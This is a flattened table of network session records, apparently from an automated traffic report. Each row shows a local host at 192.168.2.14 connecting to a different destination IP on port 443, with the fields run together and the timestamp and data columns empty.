                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13219192.168.2.145811690.231.127.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13220192.168.2.145178871.106.221.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13221192.168.2.1459828198.229.46.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13222192.168.2.1441290175.212.97.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13223192.168.2.1451000202.192.11.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13224192.168.2.1447860210.99.203.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13225192.168.2.145038895.102.97.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13226192.168.2.1459518112.14.90.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13227192.168.2.145877447.95.207.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13228192.168.2.143506687.148.40.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13229192.168.2.1435128185.219.143.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13230192.168.2.144641092.192.217.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13231192.168.2.143699427.186.157.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13232192.168.2.143313295.135.89.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13233192.168.2.1450738183.216.100.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13234192.168.2.145293632.94.166.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13235192.168.2.144824240.137.184.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13236192.168.2.144044893.186.137.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13237192.168.2.1435860131.251.160.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13238192.168.2.1432858130.198.18.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13239192.168.2.146020062.94.5.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13240192.168.2.1452818145.118.122.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13241192.168.2.145298640.89.2.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13242192.168.2.1453154208.84.211.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13243192.168.2.144701632.108.87.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13244192.168.2.144615618.17.127.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13245192.168.2.143733217.170.100.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13246192.168.2.145310680.186.56.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13247192.168.2.1460506200.91.169.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13248192.168.2.1450056169.124.80.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13249192.168.2.145433870.150.7.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13250192.168.2.1459054170.87.220.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13251192.168.2.1448864218.159.69.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13252192.168.2.1455116166.40.7.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13253192.168.2.144440288.150.136.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13254192.168.2.1447920106.236.39.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13255192.168.2.145261481.20.91.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13256192.168.2.1435676204.252.250.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13257192.168.2.1457928102.132.11.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13258192.168.2.1450490151.160.58.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13259192.168.2.14570709.200.254.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13260192.168.2.1438318117.142.98.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13261192.168.2.144034680.93.207.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13262192.168.2.144805269.204.116.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13263192.168.2.1460404223.242.243.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13264192.168.2.144707852.37.11.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13265192.168.2.144480243.141.33.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13266192.168.2.145637843.213.10.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13267192.168.2.144063472.83.192.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13268192.168.2.1442918213.236.205.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13269192.168.2.1445006101.14.113.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13270192.168.2.1448474178.6.131.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13271192.168.2.143324627.155.212.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13272192.168.2.14587662.37.218.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13273192.168.2.1449448163.250.114.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13274192.168.2.1446718133.23.76.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13275192.168.2.1440822217.51.225.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13276192.168.2.1458528166.126.183.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13277192.168.2.1439508209.128.201.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13278192.168.2.145785427.234.62.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13279192.168.2.1444812112.205.158.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13280192.168.2.1460164177.98.180.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13281192.168.2.1456080174.15.55.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13282192.168.2.1442278167.144.40.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13283192.168.2.145810643.171.131.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13284192.168.2.1436090202.211.71.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13285192.168.2.1446154120.190.220.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13286192.168.2.145208467.34.199.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13287192.168.2.1434482213.136.27.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13288192.168.2.144657282.201.184.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13289192.168.2.144350880.245.228.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13290192.168.2.146087653.40.186.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13291192.168.2.1450846147.65.44.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13292192.168.2.1455090131.35.117.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13293192.168.2.1439226194.195.67.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13294192.168.2.143279445.27.103.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13295192.168.2.143306441.234.91.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13296192.168.2.1433248122.233.243.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13297192.168.2.1433814132.235.190.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13298192.168.2.1460640145.142.120.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13299192.168.2.1432986141.102.195.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13300192.168.2.1458658143.112.35.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13301192.168.2.144029275.115.20.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13302192.168.2.1453528209.111.156.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13303192.168.2.1451550135.19.128.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13304192.168.2.1441774163.217.216.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13305192.168.2.1450028167.55.247.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13306192.168.2.1456592136.252.212.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13307192.168.2.144468269.186.154.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13308192.168.2.1433240183.130.158.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13309192.168.2.1448284212.22.168.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13310192.168.2.145783489.104.20.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13311192.168.2.144639643.141.160.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13312192.168.2.144506218.137.12.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13313192.168.2.1444548114.137.242.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13314192.168.2.144987681.202.71.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13315192.168.2.1438566132.80.182.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13316192.168.2.1439980104.57.94.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13317192.168.2.1443712105.21.4.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13318192.168.2.1443364164.236.4.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13319192.168.2.1454064140.87.65.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13320192.168.2.144129836.182.59.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13321192.168.2.1433460119.220.54.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13322192.168.2.1455678202.155.226.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13323192.168.2.144271686.90.142.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13324192.168.2.1446690114.101.102.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13325192.168.2.146041412.165.242.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13326192.168.2.1440546156.220.241.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13327192.168.2.145248888.1.223.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13328192.168.2.1453232138.209.142.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13329192.168.2.143870286.182.68.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13330192.168.2.1451076196.36.106.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13331192.168.2.1453676106.1.113.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13332192.168.2.1454622110.241.98.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13333192.168.2.1458854188.79.118.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13334192.168.2.1438906133.44.105.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13335192.168.2.143406252.53.148.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13336192.168.2.1457418212.57.18.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13337192.168.2.143638038.18.35.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13338192.168.2.144432470.157.19.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13339192.168.2.1451902178.235.141.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13340192.168.2.1436266153.59.92.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13341192.168.2.1436328134.167.178.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13342192.168.2.1452448188.174.215.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13343192.168.2.145796067.199.231.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13344192.168.2.1459668194.222.22.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13345192.168.2.1460760118.35.238.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13346192.168.2.1435302147.191.89.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13347192.168.2.1460520208.36.255.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13348192.168.2.1453256125.77.210.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13349192.168.2.1439126207.41.39.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13350192.168.2.1450128115.28.177.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13351192.168.2.144133014.6.24.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13352192.168.2.1445610107.227.161.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13353192.168.2.143565076.171.92.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13354192.168.2.143554491.248.161.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13355192.168.2.143935613.73.227.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13356192.168.2.1453678139.172.239.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13357192.168.2.1448754192.143.176.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13358192.168.2.1446298223.20.227.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13359192.168.2.143525432.137.162.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13360192.168.2.1446616195.1.167.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13361192.168.2.1433000210.216.126.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13362192.168.2.1434160196.189.232.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13363192.168.2.1452380184.175.89.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13364192.168.2.1436882219.124.11.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13365192.168.2.1444068193.119.39.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13366192.168.2.144316043.171.29.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13367192.168.2.1460386209.160.94.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13368192.168.2.1434312115.197.75.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13369192.168.2.143737454.146.97.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13370192.168.2.1458030197.177.223.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13371192.168.2.145785260.78.251.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13372192.168.2.144082635.32.97.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13373192.168.2.1449130176.108.93.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13374192.168.2.145320041.155.84.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13375192.168.2.1440728138.186.22.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13376192.168.2.1458122128.120.162.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13377192.168.2.1443164219.249.222.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13378192.168.2.1449826129.35.2.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13379192.168.2.143360299.157.197.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13380192.168.2.1460114204.212.169.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13381192.168.2.1440234210.252.129.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13382192.168.2.1435040209.119.15.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13383192.168.2.1441088150.60.178.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13384192.168.2.145313089.196.44.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13385192.168.2.143765488.195.37.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13386192.168.2.1441344114.88.220.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13387192.168.2.144652837.170.159.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13388192.168.2.1455126145.84.107.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13389192.168.2.1442136173.92.217.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13390192.168.2.1456320113.182.146.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13391192.168.2.144938291.122.255.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13392192.168.2.144798472.209.214.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13393192.168.2.1441968180.47.222.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13394192.168.2.1440700192.227.200.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13395192.168.2.144620825.37.34.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13396192.168.2.1446196222.239.142.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13397192.168.2.1436812170.131.137.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13398192.168.2.1436558161.170.37.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13399192.168.2.1440964207.54.140.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13400192.168.2.1448266107.217.11.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13401192.168.2.1453564108.154.209.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13402192.168.2.1446056192.180.19.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13403192.168.2.1452028147.23.235.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13404192.168.2.1436734184.31.207.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13405192.168.2.145985293.239.9.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13406192.168.2.144683017.144.215.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13407192.168.2.1442846109.183.88.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13408192.168.2.1432884163.252.85.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13409192.168.2.1454280155.77.21.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13410192.168.2.144838020.45.95.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13411192.168.2.1455370168.177.206.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13412192.168.2.14579021.226.146.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13413192.168.2.144348281.58.27.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13414192.168.2.1433550159.126.158.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13415192.168.2.1454620156.171.160.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13416192.168.2.1451846184.204.145.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13417192.168.2.1434018216.62.142.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13418192.168.2.1451526167.140.245.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13419192.168.2.1454352173.41.76.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13420192.168.2.1438956212.132.161.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13421192.168.2.146010057.143.209.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13422192.168.2.1453172130.129.209.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13423192.168.2.1444604178.46.11.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13424192.168.2.1457446177.209.103.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13425192.168.2.145730482.231.45.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13426192.168.2.1433396212.15.225.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13427192.168.2.14606921.81.164.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13428192.168.2.1451014140.100.155.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13429192.168.2.143949853.251.236.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13430192.168.2.1458808161.34.82.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13431192.168.2.144806896.132.150.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13432192.168.2.1446578169.108.172.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13433192.168.2.143347467.64.101.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13434192.168.2.1457708220.29.93.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13435192.168.2.145429680.239.250.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13436192.168.2.145890689.169.70.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13437192.168.2.144271634.3.58.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13438192.168.2.144654892.76.237.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13439192.168.2.144729617.193.144.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
